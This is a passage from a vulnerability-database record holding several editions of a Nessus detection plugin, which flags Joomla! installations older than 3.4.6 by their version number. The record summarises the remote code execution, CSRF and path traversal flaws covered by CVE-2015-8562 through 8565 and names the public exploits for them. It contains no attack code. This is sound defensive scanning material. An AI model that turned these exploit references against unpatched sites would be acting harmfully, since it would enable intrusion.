script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 27}, "differentElements": ["modified"], "edition": 12, "lastseen": "2019-10-28T20:32:08"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its self-reported version number, the Joomla! installation running on the remote web server is prior to 3.4.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to improper sanitization of session values. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists due to HTTP requests to com_templates not requiring multiple steps, explicit confirmation, or a unique token when performing certain sensitive actions. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a specially crafted link, to cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper sanitization of user-supplied input via the XML install file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 3, "hash": "8e8c5c55708366fb006e740ee1f2d4fa9aecd98cb98ec6dd76aecc95218726d9", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "be65a2733991b80a705086c8a61c5d46", "key": "modified"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "8af1ff68d7523a7291f605d1fac9f6af", "key": "sourceData"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "da65470e1074a8a2b67a229e55366e45", "key": "href"}, {"hash": "df36c3dd76c887d5754a53e4a353a037", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=87416", "id": "JOOMLA_346.NASL", "lastseen": "2016-12-01T01:35:45", "modified": "2016-11-30T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/11/30 17:17:31 $\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_osvdb_id(\n 131679,\n 131680,\n 131681,\n 131682\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla%21\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 3}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2016-12-01T01:35:45"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:joomla:joomla\\!"], "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its self-reported version number, the Joomla! installation running on the remote web server is prior to 3.4.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to improper sanitization of session values. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists due to HTTP requests to com_templates not requiring multiple steps, explicit confirmation, or a unique token when performing certain sensitive actions. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a specially crafted link, to cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper sanitization of user-supplied input via the XML install file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "3502eb80206282e2330c51cae895e76840c483c33191a12fdb837e89a187f694", "hashmap": [{"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "0f5e1fded7e98cbb2030291715b3eb9d", "key": "modified"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "02d316ee0fb17568bed32b0e4cb01c65", "key": "sourceData"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "6d1c534dc9bfdb4206c06293dcccafda", "key": "cpe"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "da65470e1074a8a2b67a229e55366e45", "key": "href"}, {"hash": "df36c3dd76c887d5754a53e4a353a037", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=87416", "id": "JOOMLA_346.NASL", "lastseen": "2017-10-29T13:37:31", "modified": "2017-05-19T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2017/05/19 13:58:07 $\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_osvdb_id(\n 131679,\n 131680,\n 131681,\n 131682\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 23}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2017-10-29T13:37:31"}], "edition": 15, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "6d1c534dc9bfdb4206c06293dcccafda"}, {"key": "cvelist", "hash": "871c430e5e5dff2841813e7218c22d5c"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "a67b72711b557eaa1cb901087a882768"}, {"key": "href", "hash": "f0c058e0d7789cc02544fb074c2ebeb8"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "6f971b8a5752c9a4a44306db39282683"}, {"key": "published", "hash": "fe431d002c3234b19fc0c7c4c23ca999"}, {"key": "references", "hash": "3bbb9f1695f78e751a165135d1e6933f"}, {"key": "reporter", "hash": "f82feb6b55f329a4801a7908bc18a9d6"}, {"key": "sourceData", "hash": "9c95562c2b2059addaa39c0c8952b1ea"}, {"key": "title", "hash": "e7b4b8d462ef6ff4a4efa192ec0c3507"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "fd9db7aa3b5a8ef9b937218a794224207109f0c085e067d15e2afbabe4772783", "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-8565", "CVE-2015-8563", "CVE-2015-8564", "CVE-2015-8562"]}, {"type": "freebsd", "idList": ["A9F60CE8-A4E0-11E5-B864-14DAE9D210B8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105486", "OPENVAS:1361412562310105487"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_A9F60CE8A4E011E5B86414DAE9D210B8.NASL", "JOOMLA_OBJECT_INJECTION.NASL", "JOOMLA_347.NASL"]}, {"type": "joomla", "idList": ["JOOMLA-635", "JOOMLA-633", "JOOMLA-634", "JOOMLA-630"]}, {"type": "canvas", "idList": ["JOOMLA_SESSION_UNSERIALIZE"]}, {"type": "saint", "idList": ["SAINT:1E0BFF3A5AC9A780E289B143FCC5F23A", "SAINT:C6AA8FC60EF73B444D044C4F52877D2B", "SAINT:150A052478728FE6FC97F9B52382B525"]}, {"type": "exploitdb", "idList": ["EDB-ID:38977", "EDB-ID:39033"]}, {"type": "zdt", "idList": ["1337DAY-ID-24758", "1337DAY-ID-24763"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135100", "PACKETSTORM:134949"]}, {"type": "threatpost", "idList": ["THREATPOST:9475C86517671FDF8D35E7E89FB91463"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"]}], "modified": "2019-12-13T07:51:53"}, "score": {"value": 7.4, "vector": "NONE", "modified": "2019-12-13T07:51:53"}, "vulnersScore": 7.4}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "naslFamily": "CGI abuses", "pluginID": "87416", "cpe": ["cpe:/a:joomla:joomla\\!"], "scheme": null}
